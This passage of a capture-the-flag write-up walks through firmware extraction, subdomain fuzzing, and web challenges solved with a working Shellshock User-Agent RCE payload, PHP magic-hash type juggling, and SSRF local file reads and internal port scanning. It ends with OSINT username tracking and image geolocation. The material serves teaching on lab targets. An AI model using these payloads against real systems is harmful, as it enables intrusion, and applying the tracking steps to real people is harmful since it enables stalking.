<p>But for first, read the manual :D</p>
<pre><code>$ man binwalk
---[SNIP]---
Extraction Options:
    -e, --extract
        Automatically extract known file types
</code></pre>
<ul>
<li>Here's what we need <code>-e</code> to extract the contents of the file</li>
</ul>
<pre><code>$ binwalk -e firmware.bin
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
53952         0xD2C0          U-Boot version string, &quot;U-Boot 1.1.3 (Mar 19 2018 - 15:36:42)&quot;
66560         0x10400         LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2986732 bytes
1049088       0x100200        Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 3976959 bytes, 522 inodes, blocksize: 131072 bytes, created: 2021-01-07 11:49:59
</code></pre>
<ul>
<li>We got the same output but if you list the directories now you can see there is a new one named <code>_firmware.bin.extracted</code></li>
</ul>
<p>Let's go into this directory and list the files!</p>
<pre><code>$ cd _firmware.bin.extracted
$ ls
squashfs-root  100200.squashfs  10400  10400.7z
</code></pre>
<ul>
<li>We have some weird files (<code>100200.squashfs</code>, <code>10400</code>), a zip archive (<code>10400.7z</code>) and a new directory <code>squashfs-root</code></li>
</ul>
<p>For first, let's go into this directory and see what's inside :D</p>
<pre><code>$ cd squashfs-root
$ ls
bin  dev  etc  lib  mnt  proc  sbin  sys  usr  var  web  linuxrc
</code></pre>
<ul>
<li>This is the root of a unix-based system!</li>
</ul>
<p>After some exploration we can say this is a very small system but there is no flagfile.
This is the time when we should use <code>grep</code> again!</p>
<pre><code>$ grep -r 'flag' ./ 2&gt;/dev/null
</code></pre>
<ul>
<li>This returns a lot of results (mainly stuff from <code>/web</code>)</li>
</ul>
<p>Let's filter this <code>/web</code> junk out of our results!</p>
<pre><code>$ grep -r 'flag' ./ 2&gt;/dev/null | grep -v '/web'
./etc/init.d/rcS:echo &quot;ZmxhZ3tmMXJtdzRyM19mdW59Cg==&quot; &gt; /etc/flag
</code></pre>
<ul>
<li>We got only one result!</li>
<li>It echoes some encoded string to <code>/etc/flag</code> but <code>/etc/flag</code> does not exists</li>
</ul>
<p>We can try to decrypt this string as <code>base64</code>:</p>
<pre><code>$ echo &quot;ZmxhZ3tmMXJtdzRyM19mdW59Cg==&quot; | base64 -d
flag{f1rmw4r3_fun}
</code></pre>
<p><strong><em>Takeaways</em></strong>:</p>
<ul>
<li>Always think of other extraction tools (like <code>binwalk</code>)</li>
<li>If you can't find the thing by hand, let the computer do it for you ;) (<code>grep</code>)</li>
<li>Encoded strings are always interesting</li>
</ul>
<h1>7. Misc challenge</h1>
<h2>Never - 150</h2>
<blockquote><p>I have an other pet project, if you can find it please sub(scribe). Look carefully</p>
</blockquote>
<blockquote><p>Useful worldlist included :wink:</p>
</blockquote>
<p>File: <a href="chall/subdomains-top1million-5000.txt">subdomains-top1million-5000.txt</a></p>
<ul>
<li>We have to do some subdomain discovery on the target (t4ks3c.xyz)!</li>
<li>The wordlist is a part of <a href="https://github.com/danielmiessler/SecLists">SecLists</a></li>
</ul>
<pre><code>$ ffuf -fw 3 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H &quot;Host: FUZZ.t4ks3c.xyz&quot; -u https://t4ks3c.xyz

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.1.0
________________________________________________

 :: Method           : GET
 :: URL              : https://t4ks3c.xyz
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.t4ks3c.xyz
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response words: 3
________________________________________________

www                     [Status: 200, Size: 1184, Words: 466, Lines: 35]
autoconfig              [Status: 200, Size: 59117, Words: 4802, Lines: 380]
autodiscover            [Status: 200, Size: 59117, Words: 4802, Lines: 380]
WWW                     [Status: 200, Size: 1184, Words: 466, Lines: 35]
tube                    [Status: 200, Size: 4159, Words: 562, Lines: 75]
:: Progress: [4997/4997] :: Job [1/1] :: 454 req/sec :: Duration: [0:00:11] :: Errors: 0 ::
</code></pre>
<ul>
<li>www / WWW</li>
<li>autoconfig</li>
<li>autodiscover</li>
<li>tube</li>
</ul>
<p>We need <code>tube</code> here because the other ones are <strong>OUT OF SCOPE</strong>!</p>
<p>There are 3 videos on this PeerTube instance:</p>
<p><img src="img/peertube.png" alt="peertube.png" /></p>
<ul>
<li><a href="https://tube.t4ks3c.xyz/videos/watch/a18a3288-2a02-4793-8a81-a1639f855a4b">tube.t4ks3c.xyz/videos/watch/a18a3288-2a02-4793-8a81-a1639f855a4b</a>: just a meme :D</li>
<li><a href="https://tube.t4ks3c.xyz/videos/watch/533fff15-7ec5-4da3-8e11-7188be6c7668">tube.t4ks3c.xyz/videos/watch/533fff15-7ec5-4da3-8e11-7188be6c7668</a>: the video we need!</li>
<li><a href="https://tube.t4ks3c.xyz/videos/watch/94c4e588-8bc1-4f1c-9e8b-3b851053389a">tube.t4ks3c.xyz/videos/watch/94c4e588-8bc1-4f1c-9e8b-3b851053389a</a>: idk someone had fun trying out the platform xD</li>
</ul>
<p>Open the Video and go to <code>01:01</code> then hit <code>.</code> in order to <strong>go forward only one</strong> frame! You have to hit it sometimes and then you will get the qr code around <code>01:02</code>:</p>
<p><img src="img/never_qr.png" alt="never_qr.png" /></p>
<p><img src="img/never_qr_only.png" alt="never_qr_only.png" /></p>
<p>Now, we can use <code>zbarimg</code> to extract the data of this qr:</p>
<pre><code>$ zbarimg -q img/never_qr_only.png
QR-Code:flag{r1ck_4sc111}
</code></pre>
<h1>8. Web challenges</h1>
<h2>Date app - 200 - By ~T4r0</h2>
<blockquote><p>I'm really good at programming and using up-to-date software. Prove me wrong maybe?</p>
</blockquote>
<blockquote><p><strong>NO AUTOMATED TOOLS REQUIRED TO SOLVE THIS CHALLENGE</strong></p>
</blockquote>
<p>Challenge link: <a href="http://1337b01s.duckdns.org:8080/">1337b01s.duckdns.org:8080/</a></p>
<p>Going to the page:</p>
<blockquote><p>I'm a 1337 lvl programmer and i made this extremely complicated date application, which gives you the current date.</p>
</blockquote>
<blockquote><p>You can find it here: <a href="http://1337b01s.duckdns.org:8080/cgi-bin/dateapp">1337b01s.duckdns.org:8080/cgi-bin/dateapp</a></p>
</blockquote>
<p>/cgi-bin/dateapp:
Sun Jan 17 16:45:06 UTC 2021</p>
<ul>
<li>it executes the unix <code>date</code> program and prints out the output</li>
<li>There is an old vulnerability named <strong>SHELLSHOCK</strong> which was common in old <strong>CGI</strong> applications!</li>
</ul>
<p>Now, we have a <code>/cgi-bin</code> directory and a <code>dateapp</code> file that runs <code>date</code>.
This means <code>dateapp</code> is a shell executable sh script.</p>
<ul>
<li>SHELLSHOCK depends on a shell executable file and the webserver</li>
</ul>
<p><strong><em>L3T'S PWN Th3 5yS73M!</em></strong></p>
<p>Let's hit up <a href="https://github.com/swisskyrepo/PayloadsAllTheThings">PayloadsAllTheThings</a> which is an AWESOME repo!
And search for shellshock with github's file search (<code>Go to File</code>):</p>
<p>There is one match, a python script:</p>
<ul>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Shellshock%20CVE-2014-6271.py">github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Shellshock%20CVE-2014-6271.py</a></li>
</ul>
<p>Okay so there is the payload we need in <strong>line 30</strong>:</p>
<pre><code>'User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command
</code></pre>
<pre><code>User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; &lt;COMMAND&gt;
</code></pre>
<ul>
<li>If we send a malicious User-Agent string to the shellshock vulnerable application we must get remote code execution.</li>
<li>At least on paper ;) because there are always blacklists and stuff that makes systems a little more secure :D</li>
</ul>
<p>I think we could use this script and have fun but that's not we want!
We want to CONTROL everything!</p>
<p>So we will use <code>curl</code> here. Check for command execution with the most basic, non-dangerous program like echo.
If my input gets reflected in the output I will know I have found an RCE!</p>
<pre><code>$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; echo &quot;asdf&quot;; echo &quot;fghj&quot;' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
asdf
fghj
Content-type: text/html

Sun Jan 17 16:59:37 UTC 2021
</code></pre>
<ul>
<li>rce confirmed :D</li>
</ul>
<p>Time to find the flag:</p>
<pre><code>$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; ls' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
</code></pre>
<ul>
<li>That's what I was talking about.. <code>ls</code> didn't work because there are some blacklisted programs :/</li>
</ul>
<p>No problem because we can use <code>echo</code> to <strong>list every file in a directory</strong>!
You can try it on your local machine by running <code>echo *</code>. It will list every file and directory in your current working directory.
But these are only the non-hidden files. Hey, I got ya back you can use <code>echo .*</code> to <strong>list every hidden file / directory</strong>!</p>
<p><em>A neat little trick, isn't it? :D</em></p>
<pre><code>$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; echo *' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
dateapp flag834658436784685737488435682365ff
Content-type: text/html

Sun Jan 17 17:05:00 UTC 2021
</code></pre>
<ul>
<li>Oh yeah we got it!</li>
</ul>
<p>Now, we have the filename we just have to print it out somehow.</p>
<pre><code>$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; cat flag834658436784685737488435682365ff' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
</code></pre>
<ul>
<li>But cat / tac didn't work</li>
</ul>
<p>Now, you need to go back a little. there are 2 files in the current directory. <code>dateapp</code> and <code>flag834658436784685737488435682365ff</code>.
You can access <code>dateapp</code> at <code>/cgi-bin/dateapp</code> so we should be able to access the flag from:</p>
<pre><code>/cgi-bin/flag834658436784685737488435682365ff
</code></pre>
<pre><code>$ curl http://1337b01s.duckdns.org:8080/cgi-bin/flag834658436784685737488435682365ff
flag{1m_sh0ck3d_th4t_th1s_3v3n_3xist3d}
</code></pre>
<ul>
<li>We successfully got the flag!</li>
</ul>
<h2>Harry Potter and the Order of the Phoenix - 200 - By ~T4r0</h2>
<blockquote><p>I've found a page, but I can't log in!</p>
</blockquote>
<blockquote><p><strong>NO AUTOMATED TOOLS REQUIRED TO SOLVE THIS CHALLENGE</strong></p>
</blockquote>
<p>Link: <a href="http://1337b01s.duckdns.org:9090/index.php">1337b01s.duckdns.org:9090/index.php</a></p>
<p>Hint:</p>
<ul>
<li>I programmed this app in PHP. I used to be a Python developer, so I just used my knowledge I got there. Maybe type comparison works differently in PHP? I'm not the one who knows.</li>
</ul>
<p>On the main page we can find a password field and some text:</p>
<blockquote><p>This is a page where you login with only a password! Just gotta find the right one by using some big ol' wizardry :)</p>
</blockquote>
<p>The hint mentions <code>type comparison</code> which can be related to a well-known PHP newb programming error using <code>==</code> instead of <code>===</code> and so on.</p>
<p>The name of the vulnerability is <code>PHP Type Juggling</code> you can search for it and you will surely find some awesome writeups / documentations.</p>
<ul>
<li><a href="https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf">owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf</a></li>
</ul>
<p>Weird right? But we will make use of it now :D</p>
<p>Let's search for these <code>magic hashes</code> and we will find spaze's repo:
<a href="https://github.com/spaze/hashes/">github.com/spaze/hashes/</a></p>
<p>Oh, and btw here's my friends's video on php magic hashes:
<a href="https://youtu.be/DptO8ANsTw8">youtu.be/DptO8ANsTw8</a></p>
<p>Here comes the question which hash there are tooo many!
Well, for the first blind try I instantly chose md5.</p>
<ul>
<li><a href="https://github.com/spaze/hashes/blob/master/md5.md">github.com/spaze/hashes/blob/master/md5.md</a></li>
</ul>
<p>The first line is the magical :D</p>
<pre><code>240610708:0e462097431906509019562988736854
</code></pre>
<p>So I can give the webapp <code>240610708</code> and it should log me in if the vulnerability exists.</p>
<p>Let's try it!</p>
<pre><code>$ curl -X POST -d 'passtry=240610708' http://1337b01s.duckdns.org:9090/index.php

---[SNIP]---
&lt;header class=&quot;w3-container w3-red w3-center&quot; style=&quot;padding:128px 16px&quot;&gt;
  &lt;h1 class=&quot;w3-margin w3-jumbo&quot;&gt;This is a page where you login with only a password! Just gotta find the right one by using some big ol' wizardry :)&lt;/h1&gt;
  &lt;form action=&quot;/index.php&quot; method=&quot;POST&quot;&gt;
	  &lt;input type=&quot;text&quot; id=&quot;passtry&quot; name=&quot;passtry&quot;&gt;&lt;br&gt;&lt;br&gt;
	  &lt;input type=&quot;submit&quot; value=&quot;Submit&quot;&gt;
&lt;/form&gt;
&lt;/header&gt;
&lt;h1 style=&quot;text-align: center;&quot;&gt;Congrats! The flag is: &lt;b&gt;flag{cl4ss1c_php_m4g1c}&lt;/b&gt;&lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<pre><code>flag{cl4ss1c_php_m4g1c}
</code></pre>
<p>So you wonder how did I know the <code>passtry</code> parameter.
Let me tell ya :D You can hit <code>ctrl-u</code> to view the source of the webpage and there you can see the following line:</p>
<pre><code>&lt;input type=&quot;text&quot; id=&quot;passtry&quot; name=&quot;passtry&quot;&gt;&lt;br&gt;&lt;br&gt;
</code></pre>
<h2>Gallery app - 200 - By ~T4r0</h2>
<blockquote><p>I continued my professional web developer carreer by creating another app, which can display images if you enter an URL. Check it out:</p>
</blockquote>
<blockquote><p>Gallery app: <a href="http://1337b01s.duckdns.org:8989/">1337b01s.duckdns.org:8989/</a></p>
</blockquote>
<blockquote><p><strong>NO AUTOMATED TOOLS REQUIRED TO SOLVE THIS CHALLENGE</strong></p>
</blockquote>
<p>Hint:</p>
<ul>
<li>Think about what the app does, how the application works, and what web vulnerability you can come up with.<br />
  Once you figured that out, I'll help you even more: the flag is not in any folders, and it's easy to guess its name this time.</li>
</ul>
<p>Let's open burp and capture the request!</p>
<p><img src="img/gallery1_req.png" alt="gallery1_req" /></p>
<p>Send to Repeater with <code>ctrl-r</code> and switch to repeater with <code>ctrl-shift-r</code>.
And send the request obviously.</p>
<p><img src="img/gallery1_repeater.png" alt="gallery1_repeater.png" /></p>
<ul>
<li>We got some php errors related to file opening problems because it can't open <code>asdf</code> (the random string we provided).</li>
<li>We can try to read local files!</li>
</ul>
<p>For first, try to read <code>/etc/passwd</code></p>
<p><img src="img/gallery1_etc-passwd.png" alt="gallery1_etc-passwd.png" /></p>
<ul>
<li>Success!</li>
</ul>
<p>Now, it's time to get that flag we need :D</p>
<p>Note that, it's only a get request so we don't need burp to get the flag.
We only need to make a request to <code>/index.php?url=/flag</code> and <code>curl</code> is the best tool for this.</p>
<pre><code>$ curl 1337b01s.duckdns.org:8989/index.php?url=/flag
flag{55RF_15_N0_J0K3}
---[SNIP]---
</code></pre>
<h2>Gallery app 2 - 250 - By ~T4r0</h2>
<blockquote><p>I see you've exploited my gallery app. See if you can find the second flag hidden on our internal network. The domain is: comp2.home</p>
</blockquote>
<blockquote><p><strong>SOME AUTOMATED TOOLS (OR PROGRAMMING) IS PROBABLY REQUIRED TO SOLVE THIS CHALLENGE</strong></p>
</blockquote>
<p>So they have an internal domain. I can make a request to it to open like a normal webpage like mine:</p>
<pre><code>url=https://m4t3sz.gitlab.io
</code></pre>
<p><img src="img/gallery1_web-req.png" alt="gallery1_web-req" /></p>
<p>Let's try <code>url=http://comp2.home</code>!
We still got the error like when we were requesting some random nonexistent stuff.</p>
<p>We must get the correct <strong>port number</strong> and <code>wfuzz</code> comes in handy for this work. (<code>ffuf</code> can be buggy sometimes or I just messed up something xD)</p>
<pre><code>$ wfuzz --hw 65 -w /usr/share/seclists/Fuzzing/5-digits-00000-99999.txt '1337b01s.duckdns.org:8989/index.php?url=http://comp2.home:FUZZ'
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for
more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://1337b01s.duckdns.org:8989/index.php?url=http://comp2.home:FUZZ
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000013338:   200        40 L     91 W       1216 Ch     &quot;13337&quot;
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 16842
Filtered Requests: 16841
Requests/sec.: 0
</code></pre>
<ul>
<li>Got the working port <code>13337</code>!</li>
</ul>
<pre><code>$ curl 1337b01s.duckdns.org:8989/index.php?url=http://comp2.home:13337

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;title&gt;Gallery app&lt;/title&gt;
&lt;meta charset=&quot;UTF-8&quot;&gt;
&lt;body&gt;

&lt;h1&gt;Nice work! Here's the flag for you: flag{55RF_C4N_3V3N_B3_U53D_F0R_P0RT_SC4N}&lt;/h1&gt;

&lt;/body&gt;
&lt;/html&gt;
---[SNIP]---
</code></pre>
<p>The flag is in the output:</p>
<pre><code>flag{55RF_C4N_3V3N_B3_U53D_F0R_P0RT_SC4N}
</code></pre>
<h1>9. Open-Source Intelligence</h1>
<h2>Down the rabbit hole - 250 - By ~?</h2>
<blockquote><p>One of the creators hid a flag (or a clue to get it) on his twitter. See if you can find it.</p>
</blockquote>
<blockquote><p>By ~Won't tell, it would make the challenge too EZ :)</p>
</blockquote>
<ul>
<li>TODO</li>
</ul>
<h2>Pl4y3r - 350 - By ~\M4t35Z &amp; ~T4r0</h2>
<blockquote><p>I love playing videogames :D especially with friends!</p>
</blockquote>
<blockquote><p>My username: <code>DreggHunKick</code></p>
</blockquote>
<blockquote><p>+NOTE: The flag is not the username; Try Harder ;) ++ You have to find the flag in the right format(<code>flag{some_text}</code>), otherwise it's not the flag ;)</p>
</blockquote>
<p>Hint:</p>
<ul>
<li>MOBA</li>
</ul>
<p>We have a username so we have to search for it online!</p>
<p>There are two main tools I usually use for username searches:</p>
<ul>
<li><a href="https://github.com/sherlock-project/sherlock">github.com/sherlock-project/sherlock</a></li>
<li><a href="https://github.com/soxoj/maigret">github.com/soxoj/maigret</a></li>
</ul>
<p><em>Both of them are good, but for this challenge, maigret was more reliable.</em></p>
<p>Running the tools on the known username:</p>
<pre><code>$ maigret DreggHunKick
Sites in database, enabled/total: 1523/1580
[*] Checking username DreggHunKick on:
[+] Chemistlab: http://chemistlab.ru/index/8-0-DreggHunKick
[+] Duolingo: https://www.duolingo.com/profile/DreggHunKick
[+] FortniteTracker: https://fortnitetracker.com/profile/all/DreggHunKick
[+] Gog: https://www.gog.com/u/DreggHunKick
[+] Influenster: https://www.influenster.com/DreggHunKick
[+] Medium: https://medium.com/@DreggHunKick
[?] MirTesen: https://mirtesen.ru/people/DreggHunKick/profile
[+] NameMC (Minecraft.net skins): https://namemc.com/profile/DreggHunKick
[+] Otechie: https://otechie.com/DreggHunKick
[+] Quibblo: https://www.quibblo.com/user/DreggHunKick
[+] Rutracker: https://rutracker.org/forum/profile.php?mode=viewprofile&amp;u=DreggHunKick
[+] Reddit: https://www.reddit.com/user/DreggHunKick
 ┣╸reddit_id: t5_30pnj3
 ┣╸reddit_username: DreggHunKick
 ┣╸fullname: DreggHunKick
 ┣╸image: https://www.redditstatic.com/avatars/avatar_default_07_FFB000.png
 ┣╸is_employee: False
 ┣╸is_nsfw: False
 ┣╸is_mod: False
 ┣╸is_following: True
 ┣╸has_user_profile: True
 ┣╸hide_from_robots: False
 ┣╸created_at: 2020-08-21 21:39:57
 ┣╸total_karma: 1
 ┗╸post_karma: 1
[+] Sevenforums: https://www.sevenforums.com/members/DreggHunKick.html
[+] Twitter: https://twitter.com/DreggHunKick
[+] Taringa: https://www.taringa.net/DreggHunKick
[+] Twitch: https://www.twitch.tv/DreggHunKick
[+] Xbox Gamertag: https://xboxgamertag.com/search/DreggHunKick
[+] eune.op.gg: https://eune.op.gg/summoner/userName=DreggHunKick
[+] vaz04.ru: http://vaz04.ru/index/8-0-DreggHunKick
100%|██████████████████████████████████| 1515/1515 [00:59&lt;00:00, 25.35it/s]
</code></pre>
<p>As the hint suggests, we need a MOBA(Multiplayer Online Battle Arena) game.</p>
<p>League of Legends is a well-known MOBA game and <strong>op.gg</strong> is a webpage for player statistics.</p>
<p>Let's check it out!</p>
<ul>
<li><a href="https://eune.op.gg/summoner/userName=DreggHunKick">eune.op.gg/summoner/userName=DreggHunKick</a></li>
</ul>
<p>Since the challenge description mentions <em>'especially with friends'</em> our next target should be the duo teammate <code>r34L1337</code>!</p>
<p><img src="img/pl4y3r_recent.png" alt="pl4y3r_recent.png" /></p>
<p>So, what's next? We have a new username. We have to repeat the first step.</p>
<pre><code>$ maigret r34L1337
Sites in database, enabled/total: 1523/1580
[*] Checking username r34L1337 on:
[+] Chemistlab: http://chemistlab.ru/index/8-0-r34L1337
[+] Influenster: https://www.influenster.com/r34L1337
[+] Medium: https://medium.com/@r34L1337
[+] NameMC (Minecraft.net skins): https://namemc.com/profile/r34L1337
[+] Otechie: https://otechie.com/r34L1337
[+] Quibblo: https://www.quibblo.com/user/r34L1337
[+] Sevenforums: https://www.sevenforums.com/members/r34L1337.html
[+] Twitter: https://twitter.com/r34L1337
[+] Taringa: https://www.taringa.net/r34L1337
[+] Xbox Gamertag: https://xboxgamertag.com/search/r34L1337
[+] eune.op.gg: https://eune.op.gg/summoner/userName=r34L1337
100%|██████████████████████████████████| 1515/1515 [00:49&lt;00:00, 30.55it/s]
</code></pre>
<ul>
<li>Twitter profiles are always interesting since twitter is a big social media sharing platform compared to the others listed above.</li>
</ul>
<p>Let's take a look at it!</p>
<ul>
<li><a href="https://twitter.com/r34L1337">twitter.com/r34L1337</a></li>
</ul>
<p><img src="img/pl4y3r_twitter.png" alt="pl4y3r_twitter" /></p>
<p>There are some tweets BUT <strong>did you notice the other tab</strong> on the cat screenshot?</p>
<p><img src="img/pl4y3r_tabs.jpeg" alt="pl4y3r_tabs.jpeg" /></p>
<ul>
<li>If you know flickr you know that favicon :D<br />
  Otherwise, you can make yandex reverse image search for it. I'm saying yandex because it's far more accurate than google or bing.<br />
  <img src="img/pl4y3r_favico.png" alt="pl4y3r_favico.png" /><br />
  <img src="img/pl4y3r_favico_found.png" alt="pl4y3r_favico_found.png" /></li>
<li>Flickr name is <code>th4t550m3 r34l5h17</code></li>
</ul>
<p>Since this name contains a space and flickr username search works a little differently we must do it the manual way.</p>
<ul>
<li><a href="https://www.flickr.com/search/people/?username=th4t550m3%20r34l5h17">flickr.com/search/people/?username=th4t550m3%20r34l5h17</a></li>
</ul>
<p><img src="img/pl4y3r_flickr.png" alt="pl4y3r_flickr.png" /></p>
<p>If we click the userprofile we get redirected to:</p>
<ul>
<li><a href="https://www.flickr.com/photos/191661694@N02">flickr.com/photos/191661694@N02</a></li>
<li>This is a random hash and that's the reason why sherlock / maigret aren't working properly with flickr</li>
</ul>
<p>There is only one image that we can download! It's always best to download in <strong>original size</strong>!</p>
<p><img src="img/pl4y3r_flickr_dow.png" alt="pl4y3r_flickr_dow.png" /></p>
<p>Downloaded file: <a href="chall/pl4y3r_flickr_doge.png">pl4y3r<em>flickr</em>doge.png</a></p>
<p><img src="chall/pl4y3r_flickr_doge.png" alt="pl4y3r_flickr_doge.png" /></p>
<p><em>Did you know that flickr does </em><em>NOT</em><em> purge metadata out of uploaded pictures by default?</em></p>
<p>Yes, it's time to go back to our stego basics and use <code>exiftool</code> again on the downloaded picture :D</p>
<pre><code>$ exiftool chall/pl4y3r_flickr_doge.png
ExifTool Version Number         : 12.13
File Name                       : pl4y3r_flickr_doge.png
Directory                       : chall
File Size                       : 855 KiB
File Modification Date/Time     : 2021:01:17 20:55:35+01:00
File Access Date/Time           : 2021:01:17 20:55:35+01:00
File Inode Change Date/Time     : 2021:01:17 20:55:59+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 908
Image Height                    : 872
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Copyright                       : flag{w0w_u_tr4ck3d_m3_d0wn}
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
Exif Version                    : 0232
Date/Time Original              : 6969:01:01 16:00:00
Components Configuration        : Y, Cb, Cr, -
Flashpix Version                : 0100
Color Space                     : Uncalibrated
Image Size                      : 908x872
Megapixels                      : 0.792
</code></pre>
<ul>
<li>It's in the <code>Copyright</code> field now :D</li>
</ul>
<pre><code>Copyright : flag{w0w_u_tr4ck3d_m3_d0wn}

flag{w0w_u_tr4ck3d_m3_d0wn}
</code></pre>
<h2>1337h1k3r - 500 - By ~\M4t35Z</h2>
<blockquote><p>Image geolocation challenge. I shot some dope pictures while hiking with my friends last year in Hungary.</p>
</blockquote>
<blockquote><p>From which castle I took the picture?</p>
</blockquote>
<blockquote><p>Flag format(spaces replaced by _ + no umlauts): flag{hungarian_name_of_the_castle}</p>
</blockquote>
<p>File: <a href="chall/20201027_133833.jpg">20201027_133833.jpg</a></p>
<p><img src="chall/20201027_133833.jpg" alt="20201027_133833.jpg" /></p>
<p>It's an IMINT challenge! We have to geolocate this image!</p>
<p>Taking a closer look, noting down the landmarks. Let's open the file in GIMP and mark these interesting spots.</p>
<p><img src="img/1337h1k3r_landmarks.jpg" alt="1337h1k3r_landmarks.jpg" /></p>
<p>I marked some extra things like the main shadow of the creator and the shape of houses in the back.</p>
<p><img src="img/1337h1k3r_landmarks_sun.jpg" alt="1337h1k3r_landmarks_sun" /></p>
<p>Did you notice the filename? <code>20201027_133833.jpg</code>?
The image was taken at <code>2020-10-27 13:38:33</code>.<br />
There are some shadows on the picture so we know the directions!
This means the picture is facing north.</p>
<p>Then we have to search and search until we find something that matches what we saw before.</p>
<p><img src="img/1337h1k3r_google.png" alt="1337h1k3r_google.png" /></p>
<ul>
<li><p>This shape seems similar</p>
</li>
<li><p><a href="https://www.origo.hu/kultura/20150828-magyar-varak-kastelyok-33-milliard-forint-felujitas.html">www.origo.hu/kultura/20150828-magyar-varak-kastelyok-33-milliard-forint-felujitas.html</a></p>
</li>
</ul>
<p>The name of the castle isn't mentioned but we can right-click on the picture and click <code>View Image</code>.
In some cases, webdevs/authors keep the original filename of the downloaded photo.</p>
<ul>
<li><a href="https://cdn.nwmgroups.hu/s/img/i/1508/20150828magyar-varak-somosko.jpg?w=800&amp;h=533&amp;t=5">cdn.nwmgroups.hu/s/img/i/1508/20150828magyar-varak-somosko.jpg?w=800&amp;h=533&amp;t=5</a></li>
</ul>
<blockquote><p>...<strong>somosko</strong>.jpg</p>
</blockquote>
<p><img src="img/1337h1k3r_somosko.jpg" alt="1337h1k3r_somosko" /></p>
<p>Yess, it happened again! Now we know the name of the other castle in our target image.</p>
<p>We can confirm it by opening its wikipedia page:</p>
<ul>
<li><a href="https://hu.wikipedia.org/wiki/Somosk%C5%91i_v%C3%A1r">hu.wikipedia.org/wiki/Somosk%C5%91i_v%C3%A1r</a></li>
</ul>
<p>There is an image of the castle and the surrounding village:</p>
<ul>
<li><a href="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f7/The_castle_Somosk%C5%91_and_the_village.jpg/1920px-The_castle_Somosk%C5%91_and_the_village.jpg">https://upload.wikimedia.org/wikipedia/commons/thumb/f/f7/The<em>castle</em>Somosk%C5%91<em>and</em>the<em>village.jpg/1920px-The</em>castle<em>Somosk%C5%91</em>and<em>the</em>village.jpg</a></li>
</ul>
<p><img src="img/1337h1k3r_somosko_kornyek.jpg" alt="1337h1k3r_somosko_kornyek.jpg" /></p>
<p>I marked the shapes of the castle and the village and it matches the original picture!</p>
<p><img src="img/1337h1k3r_somosko_match.png" alt="1337h1k3r_somosko_match.png" /></p>
<p>Since the challenge mentions the flag is a name of a hungarian castle we just need to find one near Somosko.</p>
<p>If we open up google maps and pan around a little bit we will eventually find <code>Salgo Vara</code> on the map!</p>
<p><img src="img/1337h1k3r_salgo_vara_gmaps.png" alt="1337h1k3r_salgo_vara_gmaps.png" /></p>
<p>Looking at the pictures and street view of it you'll notice the cobblestone in the wall and Somosko in the background which means you found the correct castle!</p>
<p><img src="img/1337h1k3r_location_confirmed.png" alt="1337h1k3r_location_confirmed.png" /></p>
<hr />
<p>I hope you enjoyed both 13374C4D3MY ctf and my writeups for the challenges!</p>
<p>You can always follow me on <a href="https://twitter.com/szilak44">twitter.com/szilak44</a></p>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
